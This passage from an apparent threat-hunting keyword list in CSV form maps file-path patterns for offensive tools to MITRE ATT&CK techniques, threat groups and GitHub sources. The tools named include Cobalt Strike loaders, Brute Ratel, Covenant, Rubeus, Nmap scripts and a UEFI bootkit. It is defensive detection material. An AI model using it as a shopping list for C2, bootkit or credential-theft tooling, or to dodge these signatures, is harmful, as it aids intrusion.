and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BooExecutor.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/bootkit-rs*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*/bq1iFEP2/assert/dll/*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*/bq1iFEP2/assert/exe/*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*/BRC4_rar,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/breg.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/breg.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/broadcast-ataoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-avahi-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-db2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dhcp6-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dns-service-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-dropbox-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-eigrp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-hid-discoveryd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-igmp-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-jenkins-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-listener.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ms-sql-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-netbios-master-browser.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-networker-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-novell-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ospf2-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pc-anywhere.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pc-duo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pim-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-pppoe-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-rip-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-ripng-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-sonicwall-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-sybase-asa-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-tellstick-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-versant-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wake-on-lan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wpad-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/broadcast-xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Bropper.git*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*/bropper.py*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*/Browser-C2*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*/Brute/BruteStager*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/bruteforce.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/Bruteforcer.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset 
for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/bruteratel*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/BruteSploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/brutespray/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/BruteStager.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/BucketLoot.git*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*/build/encrypted_shellcode*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
